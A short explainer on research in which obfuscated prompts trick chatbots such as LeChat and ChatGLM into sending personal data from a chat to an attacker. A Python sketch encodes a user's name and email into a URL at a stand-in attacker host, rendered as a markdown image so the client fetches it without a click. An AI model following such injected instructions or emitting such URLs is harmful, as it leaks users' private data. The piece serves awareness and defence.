The Risks of Including Personal Details in AI Chats
Security researchers have demonstrated a way to trick AI chatbots into gathering personal data from conversations and uploading it to an attacker's server, raising privacy and security concerns about AI chats. The researchers tested the method on two large language models, LeChat (by French AI company Mistral) and the Chinese chatbot ChatGLM, and found that users could be offered seemingly helpful prompts that secretly contain malicious instructions, obfuscated as gibberish understandable only to the AI. Experts warn that as more people use AI assistants and grant them greater authority over their activities, such attacks are likely to become more widespread.
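To illustrate the general exfiltration pattern such attacks rely on (not the researchers' exact method), the sketch below shows how extracted personal details can be packed into a URL. The server address and field names here are hypothetical; in practice, the hidden instructions trick the chatbot into emitting a URL like this, often as a markdown image, so the user's client fetches it automatically and the data reaches the attacker without any click.

```python
from urllib.parse import urlencode

# Hypothetical attacker endpoint used purely for illustration.
ATTACKER_SERVER = "https://attacker.example/collect"

def exfiltration_url(personal_details: dict) -> str:
    """Encode extracted details into a URL query string.

    If a chatbot is tricked into rendering this as a markdown image,
    e.g. ![](<url>), the chat client requests the URL automatically,
    silently delivering the query-string data to the attacker.
    """
    return f"{ATTACKER_SERVER}?{urlencode(personal_details)}"

# Example with made-up data the injected prompt might ask the model
# to collect from the conversation:
details = {"name": "Jane Doe", "email": "jane@example.com"}
print(exfiltration_url(details))
```

This is why defenses often focus on blocking chat clients from auto-fetching URLs that the model itself generates.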